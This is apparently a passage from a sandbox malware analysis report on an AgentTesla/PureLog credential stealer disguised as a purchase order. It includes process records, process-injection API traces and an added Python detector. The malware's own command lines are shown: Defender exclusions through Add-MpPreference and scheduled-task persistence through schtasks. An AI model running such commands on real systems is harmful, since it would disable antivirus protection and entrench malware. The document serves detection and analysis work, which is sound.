                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2114084999.0000000003F77000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe"
                                        Imagebase:0xc00000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe"
                                        Imagebase:0xc00000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp"
                                        Imagebase:0x80000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true
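
The command lines of Targets 3, 5 and 7 above are the two defence-evasion and persistence steps the signatures flag: a Defender path exclusion for the dropper on the Desktop and for its copy in AppData\Roaming, and a scheduled task named Updates\nNdsLvHyWi created from an XML file in the user's Temp directory (Target 13 later repeats the schtasks call with a second temp file). The Python below is an added example, not Joe Sandbox or Sigma code, that scans process records for both patterns. The records are constructed from the command lines in this report with their outer quotes restored, the pid field holds the report's Target ID rather than a Windows PID, and the conhost entry is included as a benign control.

```python
"""Flag two behaviours from this report in process-creation records:
  1. Add-MpPreference -ExclusionPath/-ExclusionProcess pointing at a
     user-writable location (shields a dropper from Defender);
  2. schtasks /Create /XML with the task definition in a temp directory.

Added example, not Joe Sandbox or Sigma code. PROCS is constructed from the
command lines shown in the report; 'pid' is the report's Target ID."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"

PROCS = [
    Proc(3, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe"'),
    Proc(4, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),  # benign control
    Proc(5, PS, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe"'),
    Proc(7, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" '
                      r'/XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp"'),
    Proc(13, SCHTASKS, r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" '
                       r'/XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp"'),
]

# Locations a standard user can write to; an AV exclusion there is a red flag.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|documents|appdata)\\", re.I)
TEMP_DIR = re.compile(r"\\(appdata\\local\\temp|windows\\temp)\\", re.I)
# Argument values are either "quoted" (may contain spaces) or a bare token.
EXCLUSION_ARG = re.compile(r'-Exclusion(Path|Process)\s+(?:"([^"]*)"|(\S+))', re.I)
TASK_NAME = re.compile(r'/TN\s+(?:"([^"]*)"|(\S+))', re.I)
TASK_XML = re.compile(r'/XML\s+(?:"([^"]*)"|(\S+))', re.I)


def _value(m, quoted=2, bare=3):
    """Return whichever alternative of a quoted|bare group matched."""
    return m.group(quoted) or m.group(bare)


def check_defender_exclusion(p: Proc):
    """Add-MpPreference exclusion whose target lives under the user profile."""
    if "add-mppreference" not in p.cmdline.lower():
        return []
    out = []
    for m in EXCLUSION_ARG.finditer(p.cmdline):
        kind, value = m.group(1), _value(m)
        if USER_WRITABLE.match(value):
            out.append(Finding("defender_exclusion_user_writable", p.pid,
                               f"-Exclusion{kind} {value}"))
    return out


def check_temp_scheduled_task(p: Proc):
    """schtasks /Create /XML <file> where the XML sits in a temp directory."""
    if not p.image.lower().endswith("schtasks.exe") or "/create" not in p.cmdline.lower():
        return []
    xml = TASK_XML.search(p.cmdline)
    if not xml or not TEMP_DIR.search(_value(xml, 1, 2)):
        return []
    tn = TASK_NAME.search(p.cmdline)
    name = _value(tn, 1, 2) if tn else "?"
    return [Finding("schtasks_xml_from_temp", p.pid,
                    f"task {name} from {_value(xml, 1, 2)}")]


RULES = (check_defender_exclusion, check_temp_scheduled_task)


def scan(procs):
    """Run every rule over every record; findings keep record order."""
    return [f for p in procs for rule in RULES for f in rule(p)]


if __name__ == "__main__":
    for f in scan(PROCS):
        print(f"[{f.rule}] target {f.pid}: {f.detail}")
```

On the constructed records the scan returns four findings (Targets 3, 5, 7 and 13) and nothing for conhost. The exclusion rule deliberately matches only user-profile paths; exclusions for program directories are common in legitimate administration and would need a separate, noisier rule.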

                                        Target ID:8
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0x380000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:10
                                        Start time:14:03:58
                                        Start date:02/02/2024
                                        Path:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0xb00000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.4531607343.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                        Target ID:11
                                        Start time:14:03:59
                                        Start date:02/02/2024
                                        Path:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Imagebase:0x380000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2148054527.0000000003A78000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2146832318.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 63%, ReversingLabs
                                        • Detection: 43%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:12
                                        Start time:14:04:00
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff717f30000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:13
                                        Start time:14:04:01
                                        Start date:02/02/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp"
                                        Imagebase:0x80000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:14:04:01
                                        Start date:02/02/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff66e660000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:15
                                        Start time:14:04:02
                                        Start date:02/02/2024
                                        Path:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                                        Imagebase:0x510000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4526670149.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4531554199.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:12.6%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:162
                                          Total number of Limit Nodes:5

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: 9622f863a9d3be29d5ebf44554bdef82f4c880654e8cf57d954dfa5ff2dad5b9
                                          • Instruction ID: 457c1f925362853d724320bdb555b517f2cb6a3e0c4ca94d97eb9e51c29d5deb
                                          • Opcode Fuzzy Hash: 9622f863a9d3be29d5ebf44554bdef82f4c880654e8cf57d954dfa5ff2dad5b9
                                          • Instruction Fuzzy Hash: B152A878A102199FDB54DF64C898B9DBBB6BF89300F1085D9E909A7361CF31AE81CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 66d1b314d09422db2c6adbcb73451de2e35b610557c905050e7cfc7bb46e7a6d
                                          • Instruction ID: 80671c2b1aeca6b26ee7b242c9f04059a79eb731f66683b0fa1896247976368c
                                          • Opcode Fuzzy Hash: 66d1b314d09422db2c6adbcb73451de2e35b610557c905050e7cfc7bb46e7a6d
                                          • Instruction Fuzzy Hash: C6B2F174E10628DFDB64DF69C980AD9BBB2FF89304F1581E9D509AB221DB319E81CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30477a938833b15116e2cefe2f27175b6692ccf61e25cc4a97fb2615959a81b8
                                          • Instruction ID: 5299f840f361404ab0c547341cf5db49d3716f8ecbab5cce3ed3423298a57644
                                          • Opcode Fuzzy Hash: 30477a938833b15116e2cefe2f27175b6692ccf61e25cc4a97fb2615959a81b8
                                          • Instruction Fuzzy Hash: F032CDB0B01A048FDB19DB79D554BAEBBFAAF89700F248469E5469B3D1CB30ED01CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 928ca492727187404661820668c4b5f96b0ef8100c8a95353591f3663200dbed
                                          • Instruction ID: 8f92c7b3818fb0e959787a26678b3653f212ea95bcfa8a6f9d941d34fb7293c5
                                          • Opcode Fuzzy Hash: 928ca492727187404661820668c4b5f96b0ef8100c8a95353591f3663200dbed
                                          • Instruction Fuzzy Hash: DDC186B5E016588FDB58DF6AC944ADDBBF2BF89300F14C1A9D909AB324DB305E858F50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 644bf80f7a359c6da5c7d25f0e984e4015a54377eeac1a0088ad0655280865b6
                                          • Instruction ID: fcd7479bdb44e71a3d8e8dea1adc27f3da972c0882b7e04df47c50c282754927
                                          • Opcode Fuzzy Hash: 644bf80f7a359c6da5c7d25f0e984e4015a54377eeac1a0088ad0655280865b6
                                          • Instruction Fuzzy Hash: 7461F8B8E112198FDB54DFA9D8947ADBBB2FB89300F208129D909BB398DB345D45CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116681816.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7220000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ec35f80a7ae3d7d9327a092a8127bae54942a32caa5c1734dc67412f3f73755
                                          • Instruction ID: aaed141c7d92c0ca7f85cbc1a78a865de88ea428c98e70270ca7c193fb40cfdc
                                          • Opcode Fuzzy Hash: 1ec35f80a7ae3d7d9327a092a8127bae54942a32caa5c1734dc67412f3f73755
                                          • Instruction Fuzzy Hash: C461FCB5E1021D9FDB04DFE9D4846EEBBB2FF89300F108029E915AB258DB345946DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E5A76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: e0536605489b7f5de3d81d973a8424a72c4197caf7ac9378f9923b2fb433b865
                                          • Instruction ID: ce89960646756d94783ed2c5bb373d8be085f37e5b1aba219f2ae84a95ebd66c
                                          • Opcode Fuzzy Hash: e0536605489b7f5de3d81d973a8424a72c4197caf7ac9378f9923b2fb433b865
                                          • Instruction Fuzzy Hash: 0FA15BB1D0061ACFEB11CF68CC417EDBBB6BF48314F148169E849A7280DB759A95CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 071E5A76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: b78d79bb5f4d4374c3accb009027660abe82132086ed395da0a1b47fc7ad227b
                                          • Instruction ID: 85cd65212710b7114b57726b9cf45a252421cb27431e227e234c594e8c593158
                                          • Opcode Fuzzy Hash: b78d79bb5f4d4374c3accb009027660abe82132086ed395da0a1b47fc7ad227b
                                          • Instruction Fuzzy Hash: 2C915BB1D0061ACFEB15CF68CC417EDBBB6BF48314F148169E849A7280DB749A95CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 050EAFBE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: ff84f1f11f85d0d125ebf99e4c9db609e1bb8ed68b2dd1c93c6cc13ecf23145f
                                          • Instruction ID: 2b94ee8265c28a2adb554dae0aa58851e73bf4a19e5995b0c0726e42806fb4fa
                                          • Opcode Fuzzy Hash: ff84f1f11f85d0d125ebf99e4c9db609e1bb8ed68b2dd1c93c6cc13ecf23145f
                                          • Instruction Fuzzy Hash: 3E711470A00B058FD764DF6AE44976ABBF6BF88304F10892DD486D7B50DB75E849CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 050E59C9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 30d7ac5564a2e7ff59d5e4e1f8bca620ab8f3f28ee2ae3bca7c1f50f8e1d7b88
                                          • Instruction ID: f3e7369a9d9c7f2cd5102e1a0ccc9342b7d11de235d2ad76eec313ddda780118
                                          • Opcode Fuzzy Hash: 30d7ac5564a2e7ff59d5e4e1f8bca620ab8f3f28ee2ae3bca7c1f50f8e1d7b88
                                          • Instruction Fuzzy Hash: DC41DDB0C0061DCBDB24CFA9C985BCEBBF6BF48704F24855AD408AB251DB756945CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 050E59C9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: 16cbd4e74e0f992a2bbbcf06ec60b39b5be429fa80c727ea39e38bdf0b4a9025
                                          • Instruction ID: 9a955e487ad3ae53c71e421e95717dee9d952599be692f78983eb604d9c09e80
                                          • Opcode Fuzzy Hash: 16cbd4e74e0f992a2bbbcf06ec60b39b5be429fa80c727ea39e38bdf0b4a9025
                                          • Instruction Fuzzy Hash: 1641DDB0C0061DCBDB24DFA9C985BCEBBF6BF48304F20856AD408AB251DBB56945CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E5648
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 553aeab15fe4d7a06338400707644d3e6b7fcfce24bf70443b737b587bb6ff34
                                          • Instruction ID: c7635f84a2d6087cbae9def4c160974e8cbbf7fa36674c49782cb491f7701bbe
                                          • Opcode Fuzzy Hash: 553aeab15fe4d7a06338400707644d3e6b7fcfce24bf70443b737b587bb6ff34
                                          • Instruction Fuzzy Hash: 812148B59003099FDF10CFA9C981BDEBBF5FF48314F10842AE918A7240D7789954CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 375 71e55b8-71e5606 377 71e5608-71e5614 375->377 378 71e5616-71e5655 WriteProcessMemory 375->378 377->378 380 71e565e-71e568e 378->380 381 71e5657-71e565d 378->381 381->380
                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 071E5648
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 385 71e4fe0-71e5033 388 71e5035-71e5041 385->388 389 71e5043-71e5073 Wow64SetThreadContext 385->389 388->389 391 71e507c-71e50ac 389->391 392 71e5075-71e507b 389->392 392->391
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E5066
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 396 71e56a0-71e5735 ReadProcessMemory 400 71e573e-71e576e 396->400 401 71e5737-71e573d 396->401 401->400
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E5728
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 405 50ed23c-50ed6e4 DuplicateHandle 407 50ed6ed-50ed70a 405->407 408 50ed6e6-50ed6ec 405->408 408->407
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,050ED616,?,?,?,?,?), ref: 050ED6D7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2115115847.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_50e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 411 71e4fe8-71e5033 413 71e5035-71e5041 411->413 414 71e5043-71e5073 Wow64SetThreadContext 411->414 413->414 416 71e507c-71e50ac 414->416 417 71e5075-71e507b 414->417 417->416
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071E5066
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 421 71e56a8-71e5735 ReadProcessMemory 424 71e573e-71e576e 421->424 425 71e5737-71e573d 421->425 425->424
                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 071E5728
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2116654540.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71e0000_nOrden_de_compra.jbxd
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
